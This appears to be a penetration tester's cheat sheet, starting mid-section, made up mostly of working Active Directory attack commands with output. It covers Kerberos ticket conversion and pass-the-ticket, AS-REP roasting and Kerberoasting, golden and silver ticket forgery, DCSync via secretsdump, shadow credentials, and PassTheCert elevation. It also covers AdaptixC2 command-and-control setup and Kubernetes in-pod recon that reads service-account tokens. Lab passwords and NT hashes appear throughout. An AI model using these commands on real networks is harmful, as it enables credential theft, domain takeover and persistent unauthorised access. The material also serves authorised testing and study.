  5. Infected account (that is set inside of msDS-AllowedToActOnBehalfOfOtherIdentity of a target service) should have an SPN (machine accounts BY DEFAULT have GenericWrite to themselves, so if you compromise a machineaccount you can write an SPN to it) (user accounts BY DEFAULT DO NOT have GenericWrite to themselves, so if you compromise a useraccount you can NOT write an SPN to it, it should already have an SPN) (default)
  6. If relay to LDAP, LDAP singing should be OFF (default)

Cred Usage

Misc

convert ccache to kirbi

# convert ticket to kirbi for Rubeus or mimikatz
impacket-ticketConverter Administrator.ccache Administrator.kirbi

# then download the ticket on windows
wget -outfile Administrator.kirbi -uri http://192.168.68.10:9595/Administrator.kirbi -usebasicparsing

# ensure all low-priv tickets are removed 
klist purge

# then import the ticket on windows
# use either this
mimikatz "kerberos::ptt Administrator.kirbi" exit
# or this
Rubeus.exe ptt /ticket:Administrator.kirbi

# ensure it's imported
klist

Pass-the-Cache

WMI

export KRB5CCNAME=Administrator.ccache && klist && impacket-wmiexec -debug -k -no-pass contoso.org/Administrator@WIN-KML6TP4LOOL
# Valid starting     Expires            Service principal
# 02/20/25 02:30:16  02/18/35 02:30:16  CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG
# renew until 02/18/35 02:30:16
# Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
#
# [+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
# [+] Using Kerberos Cache: Administrator.ccache
# [+] Returning cached credential for CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG
# [+] Using TGS from cache
# [*] SMBv3.0 dialect used
# [+] Using Kerberos Cache: Administrator.ccache
# [+] SPN HOST/WIN-KML6TP4LOOL@CONTOSO.ORG not found in cache
# [+] AnySPN is True, looking for another suitable SPN
# [+] Returning cached credential for CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG
# [+] Using TGS from cache
# [+] Changing sname from CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG to HOST/WIN-KML6TP4LOOL@CONTOSO.ORG and hoping for the best
# [+] Target system is WIN-KML6TP4LOOL and isFQDN is True
# [+] StringBinding: \\\\WIN-KML6TP4LOOL[\\PIPE\\atsvc]
# [+] StringBinding: WIN-KML6TP4LOOL[49665]
# [+] StringBinding chosen: ncacn_ip_tcp:WIN-KML6TP4LOOL[49665]
# [+] Using Kerberos Cache: Administrator.ccache
# [+] SPN HOST/WIN-KML6TP4LOOL@CONTOSO.ORG not found in cache
# [+] AnySPN is True, looking for another suitable SPN
# [+] Returning cached credential for CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG
# [+] Using TGS from cache
# [+] Changing sname from CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG to HOST/WIN-KML6TP4LOOL@CONTOSO.ORG and hoping for the best
# [+] Using Kerberos Cache: Administrator.ccache
# [+] SPN HOST/WIN-KML6TP4LOOL@CONTOSO.ORG not found in cache
# [+] AnySPN is True, looking for another suitable SPN
# [+] Returning cached credential for CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG
# [+] Using TGS from cache
# [+] Changing sname from CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG to HOST/WIN-KML6TP4LOOL@CONTOSO.ORG and hoping for the best
# [+] Using Kerberos Cache: Administrator.ccache
# [+] SPN HOST/WIN-KML6TP4LOOL@CONTOSO.ORG not found in cache
# [+] AnySPN is True, looking for another suitable SPN
# [+] Returning cached credential for CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG
# [+] Using TGS from cache
# [+] Changing sname from CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG to HOST/WIN-KML6TP4LOOL@CONTOSO.ORG and hoping for the best
# [!] Launching semi-interactive shell - Careful what you execute
# [!] Press help for extra shell commands
C:\>whoami
# contoso.org\administrator
C:\>
### PKINIT is enabled
# use a pfx file with certipy-ad
certipy-ad auth -pfx ./WIN-KML6TP4LOOL\$.pfx -dc-ip 192.168.68.64 -domain contoso.org


### PKINIT is disabled
# if you get the following error that means DC's KDC certificate doesn't support PKINIT (because DC's certificate doesn't have "KDC Authentication" EKU)
# KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)
# in order to resolve it do the following:
# the pfx format contains a private key and the cert. extract them.
certipy cert -pfx administrator_forged.pfx -nokey -out administrator.crt
certipy cert -pfx administrator.pfx -nocert -out administrator.key
# download and use "passthecert" utility
wget https://raw.githubusercontent.com/AlmondOffSec/PassTheCert/refs/heads/main/Python/passthecert.py
# even when PKINIT is not supported, we can still authenticate on a DC using mTLS - this is what PassTheCert.py does. Unfortunately, if an account you coerced and got the cert to doesn't have necessary LDAP outbound rights (e.g. it's a domain controller computer account which cannot do anything, apart from RPC DCSync - you cannot do anything with it)

# If you get something similar to "User not found in LDAP" that probably means the DC you have the cert for is not domain-joined
# now you can grant yourself DCSync privs, modify user's password or change DC's msDS-AllowedToActOnBehalfOfOtherIdentity for RBAC
# This (modify_user + -elevate) will grant the user account DCSync privileges
python3 ./passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target kelly.hill -elevate -domain push.vl -dc-host dc01.push.vl

WinRM

# MAKE SURE /etc/krb5.conf HAS THE contoso.org DOMAIN SPECIFIED
# MAKE SURE -i INCLUDES FQDN AND THAT IT IS RESOLVABLE
# make sure the SPN is HTTP/...
export KRB5CCNAME=Administrator.ccache && evil-winrm -i WIN-KML6TP4LOOL.contoso.org -r contoso.org

# IF SPN is WSMAN or HOST or ANY other - specify it in --spn parameter
evil-winrm -i WIN-KML6TP4LOOL.contoso.org -r contoso.org --spn WSMAN

Roasting

ASREPRoasting

Execution

## authenticated
impacket-GetNPUsers -format hashcat -outputfile ASREProastables.txt -dc-ip $KDC_IP -request "$DOMAIN/$USER:$PASSWD"
# impacket-GetNPUsers -format hashcat -outputfile ASREProastables.txt -dc-ip 192.168.68.64 -request 'CONTOSO.ORG/TestAlpha:win10-gui-P@$swd'
# use 'CONTOSO.ORG/' for unauthenticated bind

## with hashes
impacket-GetNPUsers -request -format hashcat -outputfile ASREProastables.txt -hashes "$LM_HASH:$NT_HASH" -dc-ip $KDC_IP "$DOMAIN/$USER"

Prerequisites

  1. At least one user on the domain is configured with DONT_REQ_PREAUTH attribute (not default)

TGSREPRoasting

Execution

  • request TGS’ for user accounts that have an SPN
# perform kerberoasting without preauth (AS-REQ) (when a user has DONT_REQ_PREAUTH)
impacket-GetUserSPNs -no-preauth "$USER" -usersfile $USERS_FILE -dc-host $KDC_IP $DOMAIN/ -request
# impacket-GetUserSPNs -no-preauth "AltAdmLocal" -usersfile users.txt -dc-host 192.168.68.64 contoso.org/ -request

# perform kerberoasting knowing user's password
impacket-GetUserSPNs -outputfile kerberoastables.txt -dc-ip $KDC "$DOMAIN/$USER:$PASSWD"
# impacket-GetUserSPNs -outputfile kerberoastables.txt -dc-ip 192.168.68.64 'contoso.org/TestAlpha:win10-gui-P@$swd'


# request a TGS for a single specific kerberoastable user (Ethan, in this case)
impacket-GetUserSPNs -request-user 'ethan' -dc-ip 10.10.11.42 'administrator.htb'/'emily':'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Prerequisites

  1. The ability to request a TGS for a particular service using a TGS-REQ (i.e. (1) user logon-session key in LSA cache (obtained using user’s kerberos key (derived from user’s NT hash) only from the previously requested AS-REP) and (2) a TGT for that user) 1. OR using AS-REQ (an account with DoNotRequirePreauth set, see HTB Rebound box).
  2. The service account’s password that you request TGS for should be configured by human (otherwise it would be nearly impossible to crack). In fact, impacket-GetUserSPNs utility only requests TGSs for user accounts that have an SPN.

KRB5 Forgery

Golden Ticket

Execution

impacket-secretsdump -outputfile secretsdump.txt 'contoso.org'/'Administrator':'win2016-cli-P@$swd1!'@'192.168.68.64'

cat secretsdump.txt.ntds
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:c70399550b62d5f52c84b2a2fad7b41a:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60fcae2d99c85fb300602b91223f9516:::
# ...

impacket-lookupsid contoso.org/Administrator@192.168.68.64
# Impacket v0.12.0.dev1 - Copyright 2023 Fortra
#
# Password:
# [*] Brute forcing SIDs at 192.168.68.64
# [*] StringBinding ncacn_np:192.168.68.64[\pipe\lsarpc]
# [*] Domain SID is: S-1-5-21-245103785-2483314120-3684157271
# ...

sudo impacket-ticketer -nthash '60fcae2d99c85fb300602b91223f9516' -domain-sid 'S-1-5-21-245103785-2483314120-3684157271' -domain 'contoso.org' 'Administrator'
# Impacket v0.12.0.dev1 - Copyright 2023 Fortra
#
# [*] Creating basic skeleton ticket and PAC Infos
# [*] Customizing ticket for contoso.org/Administrator
# [*]   PAC_LOGON_INFO
# [*]   PAC_CLIENT_INFO_TYPE
# [*]   EncTicketPart
# [*]   EncAsRepPart
# [*] Signing/Encrypting final ticket
# [*]   PAC_SERVER_CHECKSUM
# [*]   PAC_PRIVSVR_CHECKSUM
# [*]   EncTicketPart
# [*]   EncASRepPart
# [*] Saving ticket in Administrator.ccache

Silver Ticket

Execution

# get domain SID
impacket-lookupsid contoso.org/Administrator@192.168.68.179
# Impacket v0.12.0.dev1 - Copyright 2023 Fortra
#
# Password:
# [*] Brute forcing SIDs at 192.168.68.179
# [*] StringBinding ncacn_np:192.168.68.179[\pipe\lsarpc]
# [*] Domain SID is: S-1-5-21-245103785-2483314120-3684157271
# ...




ldapsearch -LLL -x -H ldap://192.168.68.179 -D 'Administrator@contoso.org' -w 'win2016-cli-P@$swd1!' -b 'dc=contoso,dc=org'
# dn: CN=WIN-NUU0DPB1BVC,OU=Domain Controllers,DC=contoso,DC=org
# objectClass: top
# objectClass: person
# objectClass: organizationalPerson
# objectClass: user
# objectClass: computer
# cn: WIN-NUU0DPB1BVC
# distinguishedName: CN=WIN-NUU0DPB1BVC,OU=Domain Controllers,DC=contoso,DC=org
# ...
# serverReferenceBL: CN=WIN-NUU0DPB1BVC,CN=Servers,CN=Default-First-Site-Name,CN
#  =Sites,CN=Configuration,DC=contoso,DC=org
# dNSHostName: WIN-NUU0DPB1BVC.contoso.org
# rIDSetReferences: CN=RID Set,CN=WIN-NUU0DPB1BVC,OU=Domain Controllers,DC=conto
#  so,DC=org
# servicePrincipalName: RPC/bd05490f-2c96-4f89-9201-c530cfa7eda4._msdcs.contoso.
#  org
# servicePrincipalName: GC/WIN-NUU0DPB1BVC.contoso.org/contoso.org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC/CONTOSO
# servicePrincipalName: ldap/bd05490f-2c96-4f89-9201-c530cfa7eda4._msdcs.contoso
#  .org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org/CONTOSO
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org/ForestDnsZones.contoso.
#  org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org/DomainDnsZones.contoso.
#  org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org/contoso.org
# servicePrincipalName: E3514235-4B06-11D1-AB04-00C04FC2DCD2/bd05490f-2c96-4f89-
#  9201-c530cfa7eda4/contoso.org
# servicePrincipalName: DNS/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC.contoso.org/CONTOSO
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC.contoso.org/contoso.org
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC/CONTOSO
# servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/WIN-NUU0DPB1BV
#  C.contoso.org
# servicePrincipalName: TERMSRV/WIN-NUU0DPB1BVC
# servicePrincipalName: TERMSRV/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: WSMAN/WIN-NUU0DPB1BVC
# servicePrincipalName: WSMAN/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: RestrictedKrbHost/WIN-NUU0DPB1BVC
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC
# servicePrincipalName: RestrictedKrbHost/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC.contoso.org
# ...



# you can use any online NTLM hash generator to obtain -nthash if you only have password

# generate TGS that is signed with service account's kerberos key (derived from -nthash) 
# for the target user "Administrator" and target SPN MSSQLSvc and apply 512 group to that user
### DONT FORGET TO FIX THE CLOCK SKEW
sudo ntpdate 192.168.68.64 && sudo impacket-ticketer -nthash fd72ca83b31d63f864440afa274bbd0c -domain-sid S-1-5-21-245103785-2483314120-3684157271 -domain contoso.org -spn HOST/WIN-KML6TP4LOOL Administrator
# 2025-02-20 02:31:38.877088 (+1100) +0.101192 +/- 0.000193 192.168.68.64 s1 no-leap
# Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

# [*] Creating basic skeleton ticket and PAC Infos
# [*] Customizing ticket for contoso.org/Administrator
# [*]     PAC_LOGON_INFO
# [*]     PAC_CLIENT_INFO_TYPE
# [*]     EncTicketPart
# /usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
# encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
# [*]     EncTGSRepPart
# [*] Signing/Encrypting final ticket
# [*]     PAC_SERVER_CHECKSUM
# [*]     PAC_PRIVSVR_CHECKSUM
# [*]     EncTicketPart
# [*]     EncTGSRepPart
# [*] Saving ticket in Administrator.ccache
# Ticket cache: FILE:Administrator.ccache
# Default principal: Administrator@CONTOSO.ORG

LDAP

BH

Resources

bloodhound-python

### EXAMPLES
bloodhound-python -c All -d 'BLACKFIELD.local' -u 'support@blackfield.local' -p '#00^BlackKnight' -ns '10.10.10.192'

quickstart

############
###  BH  ###
############
# tested on kali
sudo neo4j start              # will start as a daemon
http://127.0.0.1:7474/ # -> neo4j:neo4j -> change password

### EITHER
./BloodHound # -> neo4j:$CHANGED_PASSWORD
# configure dark theme in Settings=>DarkMode
# Ctrl+R to fix the blank screen!!

### OR
sudo vim /etc/bhapi/bhapi.conf
# enter the password

# navigate to 127.0.0.1:8080
# enter admin:admin
#
# firefox -> about:config -> webgl.force-enabled -> true

############
### BHCE ###
############
# run BHCE in container 
curl -L https://ghst.ly/getbhce | sudo docker compose -f - up
http://127.0.0.1:8080 => admin@password_from_command_output # wait for status change

rusthound

rusthound -d certified.htb -u 'judith.mader' -p 'judith09'

sharphound

### EXAMPLES
SharpHound.exe -d contoso.local --domaincontroller $DC_IP -c All

OpenLDAP

ldapadd

### add entries to LDAP db from .ldif file 
# -D: account to authenticate to
ldapadd -D "cn=Manager,dc=example,dc=org" -W -f base.ldif

ldapdelete

ldapdelete $DN

ldapmodify

### USAGE: same as ldapadd

### EXAMPLE (- ARE ACTUALLY IMPORTANT)
dn: cn=Modify Me,dc=example,dc=com
changetype: modify
replace: mail
mail: modme@example.com
-
add: title
title: Grand Poobah
-
add: jpegPhoto
jpegPhoto:< file:///tmp/modme.jpeg
-
delete: description
-

ldapsearch

### PARAMETERS
-H ldapuri     # ldap-server uri (required for non-localhost searches)
-W             # Prompt for simple authentication
-x             # use simple authentication instead of SASL
-D binddn      # bind to ldap directory via the DN
-f             # ldif file to add
-b searchbase  # object to search for (i.e. database to search under) (e.g. cn=config)
-s {base|one|sub|children} # searchbase (most probably you want "sub" for subtree (recursive children) search)
-LLL           # print in LDIF format
-Y {EXTERNAL,DIGEST-MD5,GSSAPI} # Set the SASL auth mechanism
-ZZ            # use StartTLS (works for http://)

### FILTER
nc dc someRandomAttribute  # defines attributes to return
+                          # returns ALL attributes
'(someAttribute=*)'        # filters by attribute value

### EXAMPLES
# anonymous bind (often only `-s base` will be allowed anonymously)
ldapsearch -H ldap://10.10.11.241 -x -s base
# get everything
ldapsearch -LLL -x -H ldap://192.168.68.64 -D "Administrator@contoso.org" -w 'win2016-cli-P@$swd' -b 'dc=contoso,dc=org'
# filter by "name" LDAP attribute
ldapsearch -LLL -x -H ldap://192.168.68.64 -D "Administrator@contoso.org" -w 'win2016-cli-P@$swd' -b 'dc=contoso,dc=org' 'name=DESKTOP-PD18STT'
# show only specific attributes
ldapsearch -LLL -x -H ldap://192.168.68.64 -D "Administrator@contoso.org" -w 'win2016-cli-P@$swd' -b 'dc=contoso,dc=org' name memberOf

pywerview

# search 'administrator' user
pywerview get-netuser -w contoso.org --dc-ip 192.168.68.64 -u TestAcc -p 'win2016-cli-P@$swd' --username administrator

# get users
pywerview get-netuser -w sequel.htb --dc-ip 10.10.11.51 -u rose -p 'KxEPkKe6R8su'

# get 'management' group
pywerview get-netgroup -w certified.htb --dc-ip 10.10.11.41 -u judith.mader -p judith09 --full-data --groupname 'Management'

# check acls against management group
pywerview get-objectacl -u judith.mader -p 'judith09' -t 10.10.11.41 --resolve-sids --sam-account-name Management

# get group members
pywerview get-netgroupmember -w certified.htb --dc-ip 10.10.11.41 -u judith.mader -p judith09 --groupname 'Management'

# get DC
pywerview get-netdomaincontroller -w certified.htb --dc-ip 10.10.11.41 -u judith.mader -p judith09

Replication

DCSync

Execution

############
### UNIX ###
############
# using a plaintext password
impacket-secretsdump -outputfile $FILES_NAME "$DOMAIN"/"$USER":"$PASSWORD"@"$DOMAINCONTROLLER"
# impacket-secretsdump -outputfile contoso.dump 'CONTOSO.ORG'/'Administrator':'win2016-cli-P@$swd'@'192.168.68.64'

# with PTH (COMPUTERNAME$)
impacket-secretsdump -outputfile $FILES_NAME -hashes $LMHASH:$NTHASH $DOMAIN/"$USER"@"$DOMAINCONTROLLER"
# impacket-secretsdump -outputfile contoso.dump -hashes aad3b435b51404eeaad3b435b51404ee:d0773d3d8ae3a0f436b2b7e649faa137 'CONTOSO.ORG/WIN-NUU0DPB1BVC$@192.168.68.64'

# PTT
impacket-secretsdump -k -outputfile $FILES_NAME "$DOMAIN"/"$USER"@"$KDC_DNS_NAME"
# impacket-secretsdump -k -outputfile contoso.org.dump WIN-KML6TP4LOOL.contoso.org

# NTLM relay is POSSIBLE IF VULNERABLE TO ZEROLOGON

Prerequisites

  1. DS-Replication-Get-Changes (part of GenericAll on Domain object (Enterprise Admins))
  2. DS-Replication-Get-Changes-All (part of GenericAll on Domain object (Enterprise Admins))

Persistence

Shadow Credentials

Execution

# generate pfx and add public cert to msDS-KeyCredentialLink of a --target (make sure to save the outputed password)
python pywhisker.py -d "$FQDN_DOMAIN" -u "$USER" -p "$PASSWORD" --target "$TARGET_SAMNAME" --action "add"
python pywhisker.py -d 'contoso.org' -u 'TestAcc' -p 'win2016-cli-P@$swd' --target 'AltAdmLocal' --action 'add'
# [+] Saved PFX (#PKCS12) certificate & key at path: 4CHGOm7F.pfx
# [*] Must be used with password: QVcxLbcT0YdVbGDXqQG5

# confirm that msDS-KeyCredentialLink is added
python pywhisker.py -d "$FQDN_DOMAIN" -u "$USER" -p "$PASSWORD" --target "$TARGET_SAMNAME" --action "add"


# use this pfx cert/key pair to request a TGT
# grep the password from `pywhisker add` command and put into -pfx-pass
gettgtpkinit $DOMAIN/$USER -cert-pfx $PFX_FILE -pfx-pass $PASSWORD_FOR_PFX -dc-ip $KDC $OUTPUT.ccache
python3 ./PKINITtools/gettgtpkinit.py contoso.org/AltAdmLocal -cert-pfx ../pywhisker/4CHGOm7F.pfx -pfx-pass QVcxLbcT0YdVbGDXqQG5 -dc-ip 192.168.68.179 AltAdmLocal.ccache

Notes

  • 01.2026 Shadow Creds do not work anymore with the January Patch. However the issue related to Microsoft removing the permissions from the computer object to write to the ms-DS-Key-Credential-Link attribute. If you grant the computer object the permissions back, then the relaying works as before.

Persistence

C2

AdaptixC2

setup

cd ~
mkdir utils
cd utils
git clone https://github.com/Adaptix-Framework/AdaptixC2.git
chmod +x pre_install_linux_all.sh
sudo ./pre_install_linux_all.sh server
make server-ext
cd dist
openssl req -x509 -nodes -newkey rsa:2048 -keyout server.rsa.key -out server.rsa.crt -days 3650

sudo bash -c 'cat <<EOF > /etc/systemd/system/adaptixserver.service
[Unit]
Description=AdaptixC2

[Service]
ExecStart=/home/user/utils/AdaptixC2/dist/adaptixserver -profile /home/user/utils/AdaptixC2/dist/profile.yaml
Restart=always
User=root
WorkingDirectory=/home/user/utils/AdaptixC2/dist

[Install]
WantedBy=multi-user.target
EOF'

sudo systemctl daemon-reload
sudo systemctl enable adaptixserver.service
sudo systemctl start adaptixserver.service
sudo systemctl status adaptixserver.service
BOF
cd ~/utils/
sudo apt install g++-mingw-w64-x86-64-posix  gcc-mingw-w64-x86-64-posix  mingw-w64-tools
git clone https://github.com/Adaptix-Framework/Extension-Kit
cd Extension-Kit
make

Load all modules in AdaptixC2 client: Main menu -> Script manager -> Load new and select the extension-kit.axs file.

After doing that, you will be able to use that BOF more conveniently through an agent console directly (e.g. ldap get-users -ou "OU=Users,DC=domain,DC=local" -dc dc01.domain.local -a description,mail) However this approach requires an axscript (e.g. AD-BOF/ad.axs) to be written for each BOF. If you just wanna execute any BOF you can just use the execute bof command (e.g. execute bof /home/user/utils/bofs/bin/ldapsearch.o), (ofc adaptix won’t be able to understand this BOF, however you may observe it’s traffic under adaptixserver output logs).

After executing any of the above mentioned commands, the BOF will be automatically uploaded to the agent, injected and executed in-memory.

Linux

RDP

XRDP setup

sudo apt update && sudo apt upgrade -y
sudo apt install xrdp -y
sudo systemctl enable xrdp
sudo adduser xrdp ssl-cert
sudo systemctl restart xrdp
# now logout from desktop and use remmina to remotely connect

UAC bypasses

SSPI datagram contexts

Android

termux

Setup

# enable storage access
termux-setup-storage    # this will create a symlink set to /storage/emulated/** in termux home dir
ls ~/storage/shared

### white cursor
# Android => Settings => Dark Mode settings => disable dark mode for Termux
echo "cursor= #FFFFFF" > ~/.termux/colors.properties
termux-reload-settings

### git
# write ~ path in .ssh/config
# ensure .ssh/config is 600
echo '192.168.1.69 dc-1.aisp.aperture.local' >> ~/.hosts
echo "HOSTALIASES=~/.hosts" > ~/.bashrc
wget g -O /dev/null

Termux url opener example (executes on url share). This file should be stored under $HOME/bin/termux-url-opener

integrate nvim yank & paste with system clipboard

  • install Termux-API and follow the setup instructions
  • pkg install termux-api

Recon

Basic

DNS enum

  • find out nameserver
cat /etc/resolv.conf
# search k8s-lan-party.svc.cluster.local svc.cluster.local cluster.local us-west-1.compute.internal
# nameserver 10.100.120.34
# options ndots:5
  • if you already know the hostname you want to resolve and have the necessary utility to make a request:
dig @10.100.120.34 getflag-service.k8s-lan-party.svc.cluster.local | grep -A1 "ANSWER SECTION"
# ;; ANSWER SECTION:
# getflag-service.k8s-lan-party.svc.cluster.local. 30 IN A 10.100.136.254
  • if you know the IP address you want to get a DNS name of perform a reverse DNS lookup (PTR record):
dig @10.100.120.34 -x 10.100.136.254 | grep -A1 "ANSWER SECTION"
# ;; ANSWER SECTION:
# 254.136.100.10.in-addr.arpa. 15 IN      PTR     getflag-service.k8s-lan-party.svc.cluster.local
  • Or perform reverse lookups for a CIDR via dnscan:
dnscan -subnet 10.100.0.1/16

General

# A) get username and (cluster)roles/(cluster)rolebindings you're in
kubectl auth whoami

# A) List all allowed actions in namespace "foo"
kubectl auth can-i --list --namespace 'foo'

# A) get current config that kubectl uses
kubectl config view
# if it's not successfull try grepping env/set for KUBECONFIG

# A) get all resource types available
kubectl api-resources

# A) get resources of kind
kubectl get configmaps --all-namespaces

# A) get contents of a specific object after you got the name using GET verb
kubectl describe configmap --namespace kube-system coredns

# A) get full secret
kubectl get secret sh.helm.release.v1.fluentd.v1 -o yaml

Initial from within a container

  • /etc/resolv.conf -> search property can give up coreDNS’ root.
# If you have access to /etc/resolv.conf - check if there is 'search ...' - there will be core DNS for K8s
# e.g. if `search ... XXX.YYY`, then
# API might be located at kubernetes.default.svc.XXX.YYY:443
cat /etc/resolv.conf
# search default.svc.cluster.local svc.cluster.local cluster.local kubernetes.org
# nameserver 10.96.0.10
# options ndots:5

# query the apiserver certificate
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

curl -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" --insecure https://kubernetes.default.svc.cluster.local
# {
#   "kind": "Status",
#   "apiVersion": "v1",
#   "metadata": {},
#   "status": "Failure",
#   "message": "forbidden: User \"system:serviceaccount:default:default\" cannot get path \"/\"",
#   "reason": "Forbidden",
#   "details": {},
#   "code": 403
# }
  • set -> KUBERNETES_XXX environment variables will giveup kube-proxy address and let you make requests to kube-apiserver from within a pod
root@nginx-test-574bc578fc-dbsh7:/# set | grep KUBERNETES
# KUBERNETES_PORT=tcp://10.96.0.1:443
# KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
# KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
# KUBERNETES_PORT_443_TCP_PORT=443
# KUBERNETES_PORT_443_TCP_PROTO=tcp
# KUBERNETES_SERVICE_HOST=10.96.0.1
# KUBERNETES_SERVICE_PORT=443
# KUBERNETES_SERVICE_PORT_HTTPS=443

root@nginx-test-574bc578fc-dbsh7:/# curl --insecure https://10.96.0.1
# {
#   "kind": "Status",
#   "apiVersion": "v1",
#   "metadata": {},
#   "status": "Failure",
#   "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
#   "reason": "Forbidden",
#   "details": {},
#   "code": 403
# }

root@nginx-test-574bc578fc-dbsh7:/# curl -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" --insecure https://10.96.0.1
# {
#   "kind": "Status",
#   "apiVersion": "v1",
#   "metadata": {},
#   "status": "Failure",
#   "message": "forbidden: User \"system:serviceaccount:default:default\" cannot get path \"/\"",
#   "reason": "Forbidden",
#   "details": {},
#   "code": 403
# }
  • /etc/fstab can giveup volume mount locations

  • in a container, all pod’s secret should be located under /run/secrets/kubernetes.io/serviceaccount/ directory

root@nginx-test-574bc578fc-dbsh7:/run/secrets/kubernetes.io/serviceaccount# ls -la
# drwxr-xr-x 2 root root  100 Oct 15 17:14 ..2024_10_15_17_14_13.1702215151
# lrwxrwxrwx 1 root root   32 Oct 15 17:14 ..data -> ..2024_10_15_17_14_13.1702215151
# lrwxrwxrwx 1 root root   13 Oct  7 10:02 ca.crt -> ..data/ca.crt
# lrwxrwxrwx 1 root root   16 Oct  7 10:02 namespace -> ..data/namespace
# lrwxrwxrwx 1 root root   12 Oct  7 10:02 token -> ..data/token

access a pod’s webservice using curl

kubectl get services --all-namespaces
# NAMESPACE     NAME            TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)
# monitoring    grafana         ClusterIP   10.99.24.78      <none>        80/TCP 

kubectl describe service --namespace monitoring grafana
# Name:              grafana
# Namespace:         monitoring
# Labels:            app.kubernetes.io/instance=grafana
# app.kubernetes.io/managed-by=Helm
# app.kubernetes.io/name=grafana
# app.kubernetes.io/version=11.5.2
# helm.sh/chart=grafana-8.10.3
# Annotations:       meta.helm.sh/release-name: grafana
# meta.helm.sh/release-namespace: monitoring
# Selector:          app.kubernetes.io/instance=grafana,app.kubernetes.io/name=grafana
# Type:              ClusterIP
# IP Family Policy:  SingleStack
# IP Families:       IPv4
# IP:                10.99.24.78
# IPs:               10.99.24.78
# Port:              service  80/TCP
# TargetPort:        3000/TCP
# Endpoints:         10.244.1.186:3000
# Session Affinity:  None
# Events:            <none>

curl http://10.99.24.78
# <a href="/login">Found</a>

determine what serviceAccount the Pod is using

kubectl get pods/$POD_NAME -o yaml | yq .spec.serviceAccountName

find your permissions

kubectl auth whoami
# ATTRIBUTE   VALUE
# Username    kubernetes-admin
# Groups      [kubeadm:cluster-admins system:authenticated]

# first figure out if anything apart from RBAC (default is "Node,RBAC") is used:
# it can either be defined by using AuthorizationConfiguration resource 
# or kube-apiserver command-line parameters defined in it's manifest on master-node
kubectl get authorizationconfigurations
cat /etc/kubernetes/manifests/kube-apiserver.yaml


# the following means that kubeadm:cluster-admins is a ClusterRoleBinding that points to cluster-admin ClusterRole 
# OMMIT THE "s"
kubectl get clusterrolebindings -A | grep kubeadm:cluster-admin
# kubeadm:cluster-admins          ClusterRole/cluster-admin

# cluster-admin ClusterRole can use ['*'] verbs on ['*'] api-resources, this is boring
# just for the sake of an example (of course it doesn't), 
# let's say that cluster-admins binds to ClusterRole/cilium-operator:

# the following means cilium-operator can CREATE/GET/LIST/WATCH customresourcedefinitions and 
# UPDATE specific resource named ciliumnodes
# which are contained within apiextensions.k8s.io APIVERSION
kubectl describe clusterrole cilium-operator
# Name:         cilium-operator
# Labels:       app.kubernetes.io/managed-by=Helm
# Resources                                          Non-Resource URLs  Resource Names           Verbs
# ---------                                          -----------------  --------------           -----
# customresourcedefinitions.apiextensions.k8s.io     []                 []                       [create get list watch]
# customresourcedefinitions.apiextensions.k8s.io     []                 [ciliumnodes.cilium.io]  [update]

# if the following doesn't give anything it probably (???) means the resource 
# was not created in your environment during package installation
kubectl get customresourcedefinitions | grep ciliumnodes
# ciliumnodes.cilium.io                        2024-10-06T12:55:42Z

# print object definition
kubectl describe customresourcedefinitions ciliumnodes | less

mount discovery

df
cat /etc/fstab
lsblk              # will probably fail


df
# Filesystem                                                1K-blocks    Used        Available Use% Mounted on
# overlay                                                   314560492 8837544        305722948   3% /
# fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ 9007199254739968       0 9007199254739968   0% /efs
# tmpfs                                                      62022172      12         62022160   1% /var/run/secrets/kubernetes.io/serviceaccount
# tmpfs                                                         65536       0            65536   0% /dev/null

dig fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com | grep -A1 "ANSWER SECTION"
